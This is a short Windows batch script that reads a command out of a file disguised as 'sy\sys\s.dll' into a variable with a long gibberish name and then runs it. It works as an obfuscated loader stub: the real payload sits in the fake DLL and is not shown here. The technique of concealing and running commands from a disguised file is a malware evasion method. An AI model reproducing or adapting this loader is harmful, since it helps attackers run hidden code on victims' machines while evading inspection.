@set /p @frsrgsfgaUGVFUGVKBbygbluhbGBKJUKNBihnljniJKnmFXugjugugugkugugkibhiygibuykecrazwsxdghuimpojikhluhkikuybuhifhihgiushgihfiughifhiuhgiufhgifdhuighghiagopoipooiipi09473982846778=<sy\sys\s.dll
@%@frsrgsfgaUGVFUGVKBbygbluhbGBKJUKNBihnljniJKnmFXugjugugugkugugkibhiygibuykecrazwsxdghuimpojikhluhkikuybuhifhihgiushgihfiughifhiuhgiufhgifdhuighghiagopoipooiipi09473982846778%
